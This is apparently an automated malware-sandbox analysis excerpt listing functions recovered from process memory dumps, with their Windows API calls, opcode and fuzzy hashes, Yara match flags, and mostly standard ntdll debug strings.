                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: fcd5d671ee9e321fa56ff1596bf8a23d3577d32d5066f935f20ed2a0fd690b71
                                                        • Instruction ID: 21a646a6fe7a67975bc0e4e0e9281d9b47bc73a00894f8bdc9517e48ddbcefd4
                                                        • Opcode Fuzzy Hash: fcd5d671ee9e321fa56ff1596bf8a23d3577d32d5066f935f20ed2a0fd690b71
                                                        • Instruction Fuzzy Hash: 7BE032B62442047BD610EA59DC45EEB33ADEBC8710F008419FA09A7241C661B811CAB4
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(02E219B9,?,02E34DCB,02E219B9,02E349C7,02E34DCB,?,02E219B9,02E349C7,00001000,?,?,02E39EA0), ref: 02E3860C
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: b40e374f181a5e7f06088c0508af239026d99a37d8f66eebf1b14c84ad172e33
                                                        • Instruction ID: 6df91eaa2badd3e55b576bd01daedf7fcdfff50b6c05c6acbdca3c7e4c1fff18
                                                        • Opcode Fuzzy Hash: b40e374f181a5e7f06088c0508af239026d99a37d8f66eebf1b14c84ad172e33
                                                        • Instruction Fuzzy Hash: 14E06DB12042047BD610EE49EC41EDB37ADEFC9710F008018F909A7281D670B910CBB5
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 02E280BC
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 41e75460d2c76cdf25b9bf2df3f084cf74ce42965de9562ae070f3b99972df46
                                                        • Instruction ID: f6807fa02f40c8fcd7596d761e80ee3276f3efcbf66d171eace30c75c4a5abd7
                                                        • Opcode Fuzzy Hash: 41e75460d2c76cdf25b9bf2df3f084cf74ce42965de9562ae070f3b99972df46
                                                        • Instruction Fuzzy Hash: 26E0263228020427FB24AEB8DC45F6233489B4872CF089B60B81DCF2C1EAB9F50182A0
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00008003,?,?,02E21CA0,02E370E7,02E349C7,?), ref: 02E27ED3
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 6e269ccc2046a89e5352fbc42c4229eefa4882b668fd737a69486c942e2259ec
                                                        • Instruction ID: 2c50824d4f2507a8e5831d51e550a4afbe08e4798906a23c721f8ce216eea7b9
                                                        • Opcode Fuzzy Hash: 6e269ccc2046a89e5352fbc42c4229eefa4882b668fd737a69486c942e2259ec
                                                        • Instruction Fuzzy Hash: A3D05E726842043BF640A6F58C06F57328D4B50764F45D068BA0DEF2C2ED55F5108AA5
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571809691.00000000034E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_34e0000_compact.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571809691.00000000034E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_34e0000_compact.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                        • API String ID: 0-3558027158
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        Strings
                                                        • ExecuteOptions, xrefs: 036346A0
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03634655
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03634725
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 03634787
                                                        • Execute=1, xrefs: 03634713
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036346FC
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03634742
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 0-484625025
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-$0$0
                                                        • API String ID: 1302938615-699404926
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$[$]:%u
                                                        • API String ID: 48624451-2819853543
                                                        Strings
                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036302BD
                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036302E7
                                                        • RTL: Re-Waiting, xrefs: 0363031E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                        • API String ID: 0-2474120054
                                                        Strings
                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03637B7F
                                                        • RTL: Resource at %p, xrefs: 03637B8E
                                                        • RTL: Re-Waiting, xrefs: 03637BAC
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 0-871070163
                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0363728C
                                                        Strings
                                                        • RTL: Resource at %p, xrefs: 036372A3
                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03637294
                                                        • RTL: Re-Waiting, xrefs: 036372C1
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-605551621
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$]:%u
                                                        • API String ID: 48624451-3050659472
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-
                                                        • API String ID: 1302938615-2137968064
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$@
                                                        • API String ID: 0-1194432280
                                                        APIs
                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0364CFBD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: CallFilterFunc@8
                                                        • String ID: @$@4Cw@4Cw
                                                        • API String ID: 4062629308-3101775584